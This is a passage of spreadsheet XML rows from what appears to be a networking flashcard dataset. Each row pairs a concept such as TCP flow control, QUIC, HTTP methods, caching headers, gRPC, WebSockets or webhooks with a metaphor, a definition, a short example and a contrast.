        <is>
          <t>Pouring beer for a friend: their glass size is flow control; the crowded bar you carry it through is congestion control. Pour at the smaller limit.</t>
        </is>
      </c>
      <c r="E816" t="inlineStr">
        <is>
          <t>Flow control (rwnd) keeps the sender from drowning the receiver; congestion control (cwnd) keeps it from drowning the network.</t>
        </is>
      </c>
      <c r="F816" t="inlineStr">
        <is>
          <t>send window = min(rwnd, cwnd); slow start doubles cwnd per RTT until loss, then backs off</t>
        </is>
      </c>
      <c r="G816" t="inlineStr">
        <is>
          <t>The two windows — rwnd is advertised by the receiver, cwnd is inferred from loss; the sender honors the minimum.</t>
        </is>
      </c>
      <c r="H816" t="inlineStr">
        <is>
          <t>Highway on-ramp metering lights</t>
        </is>
      </c>
      <c r="J816" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K816" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" t="n">
        <v>0</v>
      </c>
      <c r="B817" t="inlineStr">
        <is>
          <t>815</t>
        </is>
      </c>
      <c r="C817" t="inlineStr">
        <is>
          <t>UDP trade-off</t>
        </is>
      </c>
      <c r="D817" t="inlineStr">
        <is>
          <t>Throwing paper airplanes of notes across the office: instant, cheap, some land in the trash and nobody ever tells you.</t>
        </is>
      </c>
      <c r="E817" t="inlineStr">
        <is>
          <t>UDP sends unordered, unacknowledged datagrams with an 8-byte header: no handshake or retransmission — reliability traded for speed and control.</t>
        </is>
      </c>
      <c r="F817" t="inlineStr">
        <is>
          <t>DNS queries, game state, VoIP: a lost voice packet is better skipped than replayed late</t>
        </is>
      </c>
      <c r="G817" t="inlineStr">
        <is>
          <t>TCP — pays handshake and retransmission for reliability; UDP lets the app decide what loss means.</t>
        </is>
      </c>
      <c r="H817" t="inlineStr">
        <is>
          <t>Postcards vs certified letters</t>
        </is>
      </c>
      <c r="J817" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K817" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" t="n">
        <v>0</v>
      </c>
      <c r="B818" t="inlineStr">
        <is>
          <t>816</t>
        </is>
      </c>
      <c r="C818" t="inlineStr">
        <is>
          <t>Sockets</t>
        </is>
      </c>
      <c r="D818" t="inlineStr">
        <is>
          <t>A wall outlet for data: plug in (connect), current flows (read/write), unplug (close). The outlet's label lists both endpoint addresses.</t>
        </is>
      </c>
      <c r="E818" t="inlineStr">
        <is>
          <t>A socket is the OS endpoint API for network I/O; a TCP connection is uniquely named by the 5-tuple of protocol plus src/dst IP:port.</t>
        </is>
      </c>
      <c r="F818" t="inlineStr">
        <is>
          <t>s = socket(); s.bind((ip,80)); s.listen(); conn, addr = s.accept(); conn.recv(4096)</t>
        </is>
      </c>
      <c r="G818" t="inlineStr">
        <is>
          <t>Port — just a number; a socket is the live OS object bound to addresses and connection state.</t>
        </is>
      </c>
      <c r="H818" t="inlineStr">
        <is>
          <t>Telephone handset jack</t>
        </is>
      </c>
      <c r="J818" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K818" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" t="n">
        <v>0</v>
      </c>
      <c r="B819" t="inlineStr">
        <is>
          <t>817</t>
        </is>
      </c>
      <c r="C819" t="inlineStr">
        <is>
          <t>Head-of-line blocking</t>
        </is>
      </c>
      <c r="D819" t="inlineStr">
        <is>
          <t>A supermarket queue where the front shopper hunts for coupons; every cart behind is frozen even though their goods are already bagged.</t>
        </is>
      </c>
      <c r="E819" t="inlineStr">
        <is>
          <t>One lost or slow item at the front stalls everything queued behind it — TCP withholds later bytes until the gap is retransmitted.</t>
        </is>
      </c>
      <c r="F819" t="inlineStr">
        <is>
          <t>HTTP/2 multiplexes streams over one TCP connection: one lost packet stalls ALL streams; QUIC fixes this</t>
        </is>
      </c>
      <c r="G819" t="inlineStr">
        <is>
          <t>Congestion — the network is slow for everyone; HOL blocking is ready data stuck behind one missing piece.</t>
        </is>
      </c>
      <c r="H819" t="inlineStr">
        <is>
          <t>Stalled car in a one-lane tunnel</t>
        </is>
      </c>
      <c r="J819" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K819" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" t="n">
        <v>0</v>
      </c>
      <c r="B820" t="inlineStr">
        <is>
          <t>818</t>
        </is>
      </c>
      <c r="C820" t="inlineStr">
        <is>
          <t>QUIC</t>
        </is>
      </c>
      <c r="D820" t="inlineStr">
        <is>
          <t>Quick-silver couriers on rollerblades, each in an independent lane: one courier tripping never halts the others; badges (TLS) checked as they roll in.</t>
        </is>
      </c>
      <c r="E820" t="inlineStr">
        <is>
          <t>QUIC runs reliable multiplexed streams over UDP with built-in TLS 1.3, 0/1-RTT setup, and no cross-stream head-of-line blocking; HTTP/3 rides it.</t>
        </is>
      </c>
      <c r="F820" t="inlineStr">
        <is>
          <t>HTTP/3 = QUIC; the connection survives your phone switching Wi-Fi to LTE (connection IDs, not 5-tuple)</t>
        </is>
      </c>
      <c r="G820" t="inlineStr">
        <is>
          <t>HTTP/2 — multiplexes inside one TCP stream so a loss stalls all streams; QUIC streams recover independently.</t>
        </is>
      </c>
      <c r="H820" t="inlineStr">
        <is>
          <t>Bundle of drinking straws vs one wide pipe</t>
        </is>
      </c>
      <c r="J820" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K820" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" t="n">
        <v>0</v>
      </c>
      <c r="B821" t="inlineStr">
        <is>
          <t>819</t>
        </is>
      </c>
      <c r="C821" t="inlineStr">
        <is>
          <t>Teardown &amp; TIME_WAIT</t>
        </is>
      </c>
      <c r="D821" t="inlineStr">
        <is>
          <t>Two diners each fold their napkin (FIN) and nod (ACK); whoever folded first waits by the door a while in case the waiter brings a forgotten plate.</t>
        </is>
      </c>
      <c r="E821" t="inlineStr">
        <is>
          <t>TCP closes each direction with FIN/ACK; the active closer lingers in TIME_WAIT (~2xMSL) so stray old segments can't corrupt a new connection.</t>
        </is>
      </c>
      <c r="F821" t="inlineStr">
        <is>
          <t>netstat shows thousands of TIME_WAIT sockets after a load test; SO_REUSEADDR lets servers rebind</t>
        </is>
      </c>
      <c r="G821" t="inlineStr">
        <is>
          <t>RST — an abortive slam-the-phone close; FIN is the polite two-sided goodbye.</t>
        </is>
      </c>
      <c r="H821" t="inlineStr">
        <is>
          <t>Cooling-off period after signing papers</t>
        </is>
      </c>
      <c r="J821" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K821" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" t="n">
        <v>0</v>
      </c>
      <c r="B822" t="inlineStr">
        <is>
          <t>820</t>
        </is>
      </c>
      <c r="C822" t="inlineStr">
        <is>
          <t>Request/response anatomy</t>
        </is>
      </c>
      <c r="D822" t="inlineStr">
        <is>
          <t>A restaurant order slip: the verb 'GET' scrawled on top, table notes (headers) below; the kitchen returns a numbered ticket (status) stapled to the dish (body).</t>
        </is>
      </c>
      <c r="E822" t="inlineStr">
        <is>
          <t>An HTTP request is method + path + headers + optional body; the response is status line + headers + body — one exchange per request.</t>
        </is>
      </c>
      <c r="F822" t="inlineStr">
        <is>
          <t>GET /users/7 HTTP/1.1 with Host: api.example.com returns HTTP/1.1 200 OK, Content-Type: application/json, {...}</t>
        </is>
      </c>
      <c r="G822" t="inlineStr">
        <is>
          <t>The TCP stream beneath — HTTP frames one request/response pair on top of the raw byte pipe.</t>
        </is>
      </c>
      <c r="H822" t="inlineStr">
        <is>
          <t>Letter with a subject line</t>
        </is>
      </c>
      <c r="J822" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K822" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" t="n">
        <v>0</v>
      </c>
      <c r="B823" t="inlineStr">
        <is>
          <t>821</t>
        </is>
      </c>
      <c r="C823" t="inlineStr">
        <is>
          <t>HTTP methods</t>
        </is>
      </c>
      <c r="D823" t="inlineStr">
        <is>
          <t>Five stamps on a librarian's desk: a magnifying glass (GET), a 'new arrival' stamp (POST), a whole-page paste-over (PUT), correction tape (PATCH), a shredder (DELETE).</t>
        </is>
      </c>
      <c r="E823" t="inlineStr">
        <is>
          <t>Methods declare intent on a resource: GET reads, POST creates or acts, PUT replaces, PATCH edits partially, DELETE removes.</t>
        </is>
      </c>
      <c r="F823" t="inlineStr">
        <is>
          <t>POST /orders creates; PUT /orders/9 replaces entirely; PATCH /orders/9 {status:'shipped'} tweaks one field</t>
        </is>
      </c>
      <c r="G823" t="inlineStr">
        <is>
          <t>PUT vs PATCH — PUT sends the complete replacement resource; PATCH sends only the delta.</t>
        </is>
      </c>
      <c r="H823" t="inlineStr">
        <is>
          <t>CRUD verbs on a toolbelt</t>
        </is>
      </c>
      <c r="J823" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K823" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" t="n">
        <v>0</v>
      </c>
      <c r="B824" t="inlineStr">
        <is>
          <t>822</t>
        </is>
      </c>
      <c r="C824" t="inlineStr">
        <is>
          <t>Safe vs idempotent methods</t>
        </is>
      </c>
      <c r="D824" t="inlineStr">
        <is>
          <t>A light switch (PUT: flip to ON ten times, still just ON) vs a vending machine button (POST: ten presses, ten sodas). Window shopping (GET) buys nothing.</t>
        </is>
      </c>
      <c r="E824" t="inlineStr">
        <is>
          <t>Safe methods (GET, HEAD) change nothing; idempotent ones (GET, PUT, DELETE) give the same result when repeated — POST is neither.</t>
        </is>
      </c>
      <c r="F824" t="inlineStr">
        <is>
          <t>Retry a timed-out PUT safely; retry a POST and you may create duplicate orders</t>
        </is>
      </c>
      <c r="G824" t="inlineStr">
        <is>
          <t>Idempotent vs safe — DELETE is idempotent (same end state) but not safe (it changed something).</t>
        </is>
      </c>
      <c r="H824" t="inlineStr">
        <is>
          <t>Elevator call button</t>
        </is>
      </c>
      <c r="J824" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K824" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" t="n">
        <v>0</v>
      </c>
      <c r="B825" t="inlineStr">
        <is>
          <t>823</t>
        </is>
      </c>
      <c r="C825" t="inlineStr">
        <is>
          <t>Status code classes</t>
        </is>
      </c>
      <c r="D825" t="inlineStr">
        <is>
          <t>Five doors down a corridor: blue chatter (1xx), green 'come in' (2xx), yellow arrow pointing away (3xx), red mirror labeled 'your fault' (4xx), black smoke from the kitchen (5xx).</t>
        </is>
      </c>
      <c r="E825" t="inlineStr">
        <is>
          <t>1xx informational, 2xx success, 3xx redirection, 4xx client error, 5xx server error — the first digit is the contract.</t>
        </is>
      </c>
      <c r="F825" t="inlineStr">
        <is>
          <t>200 OK, 201 Created, 301 Moved, 304 Not Modified, 404 Not Found, 429 Too Many Requests, 503 Unavailable</t>
        </is>
      </c>
      <c r="G825" t="inlineStr">
        <is>
          <t>401 vs 403 — 401 means unauthenticated (who are you?); 403 means authenticated but forbidden.</t>
        </is>
      </c>
      <c r="H825" t="inlineStr">
        <is>
          <t>Traffic light with five lamps</t>
        </is>
      </c>
      <c r="J825" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K825" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" t="n">
        <v>0</v>
      </c>
      <c r="B826" t="inlineStr">
        <is>
          <t>824</t>
        </is>
      </c>
      <c r="C826" t="inlineStr">
        <is>
          <t>HTTP headers</t>
        </is>
      </c>
      <c r="D826" t="inlineStr">
        <is>
          <t>Sticky notes plastered on a parcel: 'fragile: JSON inside', 'signed by bearer token', 'recipient prefers gzip' — the courier reads the notes but never opens the box.</t>
        </is>
      </c>
      <c r="E826" t="inlineStr">
        <is>
          <t>Key-value metadata lines shaping the exchange — Content-Type, Authorization, Accept, Cache-Control: data about the data.</t>
        </is>
      </c>
      <c r="F826" t="inlineStr">
        <is>
          <t>curl -H 'Accept: application/json' -H 'Authorization: Bearer eyJ...' https://api.example.com/me</t>
        </is>
      </c>
      <c r="G826" t="inlineStr">
        <is>
          <t>Body — the payload itself; headers describe and route it and are never part of the resource.</t>
        </is>
      </c>
      <c r="H826" t="inlineStr">
        <is>
          <t>Envelope's customs declaration</t>
        </is>
      </c>
      <c r="J826" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K826" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" t="n">
        <v>0</v>
      </c>
      <c r="B827" t="inlineStr">
        <is>
          <t>825</t>
        </is>
      </c>
      <c r="C827" t="inlineStr">
        <is>
          <t>Cache-Control &amp; freshness</t>
        </is>
      </c>
      <c r="D827" t="inlineStr">
        <is>
          <t>A milk carton stamped 'best before: 3600 seconds'; the fridge (cache) pours it freely until the stamp expires, then must call the dairy again.</t>
        </is>
      </c>
      <c r="E827" t="inlineStr">
        <is>
          <t>Cache-Control directives (max-age, no-store, public/private) tell caches how long a response stays fresh without re-asking the server.</t>
        </is>
      </c>
      <c r="F827" t="inlineStr">
        <is>
          <t>Cache-Control: public, max-age=31536000, immutable on fingerprinted assets like app.9f3c2.js</t>
        </is>
      </c>
      <c r="G827" t="inlineStr">
        <is>
          <t>ETag validation — a revalidation round trip after freshness expires; max-age avoids the request entirely.</t>
        </is>
      </c>
      <c r="H827" t="inlineStr">
        <is>
          <t>Parking meter counting down</t>
        </is>
      </c>
      <c r="J827" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K827" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" t="n">
        <v>0</v>
      </c>
      <c r="B828" t="inlineStr">
        <is>
          <t>826</t>
        </is>
      </c>
      <c r="C828" t="inlineStr">
        <is>
          <t>ETag &amp; conditional 304</t>
        </is>
      </c>
      <c r="D828" t="inlineStr">
        <is>
          <t>A cloakroom ticket: show your stub and the clerk says 'same coat, keep wearing it' (304) instead of hauling a new coat over the counter.</t>
        </is>
      </c>
      <c r="E828" t="inlineStr">
        <is>
          <t>The server tags a response version (ETag); the client re-asks with If-None-Match and gets a bodiless 304 if unchanged, saving bandwidth.</t>
        </is>
      </c>
      <c r="F828" t="inlineStr">
        <is>
          <t>GET /doc returns 200 with ETag 'v42'; GET /doc If-None-Match: 'v42' returns 304 Not Modified, empty body</t>
        </is>
      </c>
      <c r="G828" t="inlineStr">
        <is>
          <t>Last-Modified — timestamp-based with 1-second granularity; ETag is an opaque exact fingerprint.</t>
        </is>
      </c>
      <c r="H828" t="inlineStr">
        <is>
          <t>Wine cork kept as receipt</t>
        </is>
      </c>
      <c r="J828" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K828" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" t="n">
        <v>0</v>
      </c>
      <c r="B829" t="inlineStr">
        <is>
          <t>827</t>
        </is>
      </c>
      <c r="C829" t="inlineStr">
        <is>
          <t>Statelessness</t>
        </is>
      </c>
      <c r="D829" t="inlineStr">
        <is>
          <t>A goldfish concierge with perfect service and zero memory: every visit you re-show your badge, and any concierge fish in the tank can serve you.</t>
        </is>
      </c>
      <c r="E829" t="inlineStr">
        <is>
          <t>Each HTTP request must carry everything needed to serve it; the server keeps no conversation memory between requests.</t>
        </is>
      </c>
      <c r="F829" t="inlineStr">
        <is>
          <t>Auth token repeated on every request; any of 50 identical servers can answer; a restart loses nothing</t>
        </is>
      </c>
      <c r="G829" t="inlineStr">
        <is>
          <t>Sessions — bolt server-side memory back on via cookies, trading away the scale-out freedom statelessness bought.</t>
        </is>
      </c>
      <c r="H829" t="inlineStr">
        <is>
          <t>Vending machine that forgets each customer</t>
        </is>
      </c>
      <c r="J829" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K829" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" t="n">
        <v>0</v>
      </c>
      <c r="B830" t="inlineStr">
        <is>
          <t>828</t>
        </is>
      </c>
      <c r="C830" t="inlineStr">
        <is>
          <t>Resources &amp; URIs</t>
        </is>
      </c>
      <c r="D830" t="inlineStr">
        <is>
          <t>A museum where every artifact has a permanent shelf label (/paintings/42); you act on labels with the same four gestures, never yelling 'doGetPainting!'</t>
        </is>
      </c>
      <c r="E830" t="inlineStr">
        <is>
          <t>REST models nouns as URI-addressed resources manipulated through uniform methods, not verb-named endpoints.</t>
        </is>
      </c>
      <c r="F830" t="inlineStr">
        <is>
          <t>GET /users/7/orders, not GET /getOrdersForUser?id=7 — the URI names a thing, the method acts on it</t>
        </is>
      </c>
      <c r="G830" t="inlineStr">
        <is>
          <t>RPC style — endpoints name actions (/createUser); REST names things and reuses standard verbs.</t>
        </is>
      </c>
      <c r="H830" t="inlineStr">
        <is>
          <t>Street addresses for every object</t>
        </is>
      </c>
      <c r="J830" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K830" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" t="n">
        <v>0</v>
      </c>
      <c r="B831" t="inlineStr">
        <is>
          <t>829</t>
        </is>
      </c>
      <c r="C831" t="inlineStr">
        <is>
          <t>Content negotiation</t>
        </is>
      </c>
      <c r="D831" t="inlineStr">
        <is>
          <t>A menu offered in three languages: you murmur 'francais, s'il vous plait' (Accept) and the same dishes arrive described differently.</t>
        </is>
      </c>
      <c r="E831" t="inlineStr">
        <is>
          <t>Client and server agree on representation via Accept and Content-Type (plus -Encoding, -Language): one resource, many formats.</t>
        </is>
      </c>
      <c r="F831" t="inlineStr">
        <is>
          <t>GET /report with Accept: text/csv returns CSV; Accept: application/json returns JSON; same URI both times</t>
        </is>
      </c>
      <c r="G831" t="inlineStr">
        <is>
          <t>URL-baked formats (/report.json) — put representation into identity; negotiation keeps one URI.</t>
        </is>
      </c>
      <c r="H831" t="inlineStr">
        <is>
          <t>Power adapter with swappable plugs</t>
        </is>
      </c>
      <c r="J831" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K831" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" t="n">
        <v>0</v>
      </c>
      <c r="B832" t="inlineStr">
        <is>
          <t>830</t>
        </is>
      </c>
      <c r="C832" t="inlineStr">
        <is>
          <t>GraphQL</t>
        </is>
      </c>
      <c r="D832" t="inlineStr">
        <is>
          <t>A build-your-own-salad bar with one cashier: you hand over a card listing every ingredient and get precisely that bowl — no fixed set menus (endpoints).</t>
        </is>
      </c>
      <c r="E832" t="inlineStr">
        <is>
          <t>A query language where clients declare exactly the fields they need in one request to a single endpoint; the server resolves the shape.</t>
        </is>
      </c>
      <c r="F832" t="inlineStr">
        <is>
          <t>POST /graphql query { user(id:7){ name orders(last:3){ total } } } returns exactly those fields in one round trip</t>
        </is>
      </c>
      <c r="G832" t="inlineStr">
        <is>
          <t>REST — fixed response shapes per endpoint cause over/under-fetching; GraphQL shapes per query but complicates HTTP caching.</t>
        </is>
      </c>
      <c r="H832" t="inlineStr">
        <is>
          <t>Mad Libs form the server fills in</t>
        </is>
      </c>
      <c r="J832" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K832" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" t="n">
        <v>0</v>
      </c>
      <c r="B833" t="inlineStr">
        <is>
          <t>831</t>
        </is>
      </c>
      <c r="C833" t="inlineStr">
        <is>
          <t>gRPC</t>
        </is>
      </c>
      <c r="D833" t="inlineStr">
        <is>
          <t>A pneumatic tube between offices: you shout a method name into it ('GetUser!') and a shrink-wrapped binary capsule whooshes back — no browsing, just calls.</t>
        </is>
      </c>
      <c r="E833" t="inlineStr">
        <is>
          <t>A high-performance RPC framework: call remote methods defined in .proto contracts, with Protobuf encoding over HTTP/2 streams.</t>
        </is>
      </c>
      <c r="F833" t="inlineStr">
        <is>
          <t>service Users { rpc GetUser(GetUserRequest) returns (User); } — codegen emits typed client stubs</t>
        </is>
      </c>
      <c r="G833" t="inlineStr">
        <is>
          <t>REST/JSON — human-readable and browser-native; gRPC is binary, contract-first, and needs a proxy for browsers.</t>
        </is>
      </c>
      <c r="H833" t="inlineStr">
        <is>
          <t>Star Trek transporter for function calls</t>
        </is>
      </c>
      <c r="J833" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K833" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" t="n">
        <v>0</v>
      </c>
      <c r="B834" t="inlineStr">
        <is>
          <t>832</t>
        </is>
      </c>
      <c r="C834" t="inlineStr">
        <is>
          <t>HTTP/2 multiplexing</t>
        </is>
      </c>
      <c r="D834" t="inlineStr">
        <is>
          <t>One highway lane carrying dozens of striped snakes braided together — each stripe a different request, unbraided again at the far end.</t>
        </is>
      </c>
      <c r="E834" t="inlineStr">
        <is>
          <t>HTTP/2 interleaves many concurrent streams as binary frames over one TCP connection, plus HPACK header compression.</t>
        </is>
      </c>
      <c r="F834" t="inlineStr">
        <is>
          <t>A browser fetches 30 assets over 1 connection; no more 6-connection limit or domain sharding</t>
        </is>
      </c>
      <c r="G834" t="inlineStr">
        <is>
          <t>HTTP/1.1 pipelining — responses had to return in order; H2 frames interleave freely (until TCP-level loss).</t>
        </is>
      </c>
      <c r="H834" t="inlineStr">
        <is>
          <t>Multitrack tape recorder</t>
        </is>
      </c>
      <c r="J834" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K834" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" t="n">
        <v>0</v>
      </c>
      <c r="B835" t="inlineStr">
        <is>
          <t>833</t>
        </is>
      </c>
      <c r="C835" t="inlineStr">
        <is>
          <t>API rate limiting</t>
        </is>
      </c>
      <c r="D835" t="inlineStr">
        <is>
          <t>A nightclub bouncer with a clicker counter per guest: your tenth entry this minute meets the velvet rope and a card reading 'come back in 42 seconds' (Retry-After).</t>
        </is>
      </c>
      <c r="E835" t="inlineStr">
        <is>
          <t>The server enforces a per-client request budget (token bucket, sliding window) and answers 429 Too Many Requests when it is spent.</t>
        </is>
      </c>
      <c r="F835" t="inlineStr">
        <is>
          <t>HTTP/1.1 429 Too Many Requests / Retry-After: 30 / X-RateLimit-Remaining: 0</t>
        </is>
      </c>
      <c r="G835" t="inlineStr">
        <is>
          <t>vs load shedding (879): shedding drops excess globally when overwhelmed; rate limiting enforces per-client budgets continuously | vs backpressure (877): backpressure slows the producer; a limiter rejects</t>
        </is>
      </c>
      <c r="H835" t="inlineStr">
        <is>
          <t>toll booth with a per-car punch card</t>
        </is>
      </c>
      <c r="J835" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K835" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" t="n">
        <v>0</v>
      </c>
      <c r="B836" t="inlineStr">
        <is>
          <t>834</t>
        </is>
      </c>
      <c r="C836" t="inlineStr">
        <is>
          <t>WebSockets</t>
        </is>
      </c>
      <c r="D836" t="inlineStr">
        <is>
          <t>A phone call spliced out of a letter exchange: the first letter says 'call me' (Upgrade: websocket), then both sides just talk over the open line.</t>
        </is>
      </c>
      <c r="E836" t="inlineStr">
        <is>
          <t>An HTTP Upgrade handshake hands the TCP connection to a persistent full-duplex message channel — either side sends anytime.</t>
        </is>
      </c>
      <c r="F836" t="inlineStr">
        <is>
          <t>ws = new WebSocket('wss://chat.example.com'); ws.send('hi'); ws.onmessage = e =&gt; render(e.data)</t>
        </is>
      </c>
      <c r="G836" t="inlineStr">
        <is>
          <t>SSE — server-to-client only over plain HTTP; WebSockets are bidirectional on an upgraded socket.</t>
        </is>
      </c>
      <c r="H836" t="inlineStr">
        <is>
          <t>Two tin cans on a permanent string</t>
        </is>
      </c>
      <c r="J836" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K836" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" t="n">
        <v>0</v>
      </c>
      <c r="B837" t="inlineStr">
        <is>
          <t>835</t>
        </is>
      </c>
      <c r="C837" t="inlineStr">
        <is>
          <t>Server-sent events</t>
        </is>
      </c>
      <c r="D837" t="inlineStr">
        <is>
          <t>A stock ticker tape chattering out of a slot in the wall — one-way tape, and if it jams, the machine re-threads itself right where it left off.</t>
        </is>
      </c>
      <c r="E837" t="inlineStr">
        <is>
          <t>SSE streams server-to-client text events over one long-lived plain HTTP response, with auto-reconnect and Last-Event-ID built in.</t>
        </is>
      </c>
      <c r="F837" t="inlineStr">
        <is>
          <t>Content-Type: text/event-stream; frames like data: {'price':101} followed by a blank line; browser: new EventSource('/ticker')</t>
        </is>
      </c>
      <c r="G837" t="inlineStr">
        <is>
          <t>WebSockets — bidirectional custom protocol; SSE is one-way, plain HTTP, proxy-friendly, auto-reconnecting.</t>
        </is>
      </c>
      <c r="H837" t="inlineStr">
        <is>
          <t>Radio station broadcast</t>
        </is>
      </c>
      <c r="J837" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K837" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" t="n">
        <v>0</v>
      </c>
      <c r="B838" t="inlineStr">
        <is>
          <t>836</t>
        </is>
      </c>
      <c r="C838" t="inlineStr">
        <is>
          <t>Webhooks</t>
        </is>
      </c>
      <c r="D838" t="inlineStr">
        <is>
          <t>You leave your home address at the tailor's; when the suit is ready, they knock on YOUR door — the note sealed with wax (HMAC) so you know it's really them.</t>
        </is>
      </c>
      <c r="E838" t="inlineStr">
        <is>
          <t>Instead of you polling, the provider POSTs an HTTP callback to your registered URL when the event happens — verify the signature.</t>
        </is>
      </c>
      <c r="F838" t="inlineStr">
        <is>
          <t>Stripe POSTs /webhooks/stripe {type:'payment.succeeded'}; verify Stripe-Signature; respond 200 fast, process async</t>
        </is>
      </c>
      <c r="G838" t="inlineStr">
        <is>
          <t>Polling an API — you ask repeatedly; a webhook reverses direction, so you must now run a public endpoint and dedupe retries.</t>
        </is>
      </c>
      <c r="H838" t="inlineStr">
        <is>
          <t>Restaurant buzzer puck</t>
        </is>
      </c>
      <c r="J838" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K838" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" t="n">
        <v>0</v>
      </c>
      <c r="B839" t="inlineStr">
        <is>
          <t>837</t>
        </is>
      </c>
      <c r="C839" t="inlineStr">
        <is>
          <t>Long polling vs push</t>
        </is>
      </c>
      <c r="D839" t="inlineStr">
        <is>
          <t>A kid asking 'are we there yet?' but dad refuses to answer until they ARE there; the instant he speaks, the kid asks again.</t>
        </is>
      </c>
      <c r="E839" t="inlineStr">
        <is>
          <t>Long polling holds each request open until data arrives, then the client immediately re-asks — near-real-time push over plain request/response.</t>
        </is>
      </c>
      <c r="F839" t="inlineStr">
        <is>
          <t>GET /messages?since=42 hangs up to 30s; returns on new message or timeout; client loops immediately</t>
        </is>
      </c>
      <c r="G839" t="inlineStr">
        <is>
          <t>Short polling — fixed-interval asking wastes requests and adds latency; long polling parks the request server-side.</t>
        </is>
      </c>
      <c r="H839" t="inlineStr">
        <is>
          <t>Fishing rod left in the water vs repeated casting</t>
        </is>
      </c>
      <c r="J839" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K839" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" t="n">
        <v>0</v>
      </c>
      <c r="B840" t="inlineStr">
        <is>
          <t>838</t>
        </is>
      </c>
      <c r="C840" t="inlineStr">
        <is>
          <t>Offset pagination</t>
        </is>
      </c>
      <c r="D840" t="inlineStr">
        <is>
          <t>Counting to seat 400 in a stadium by walking past every seat — and while you count, ushers keep wedging in new chairs, so you seat someone twice.</t>
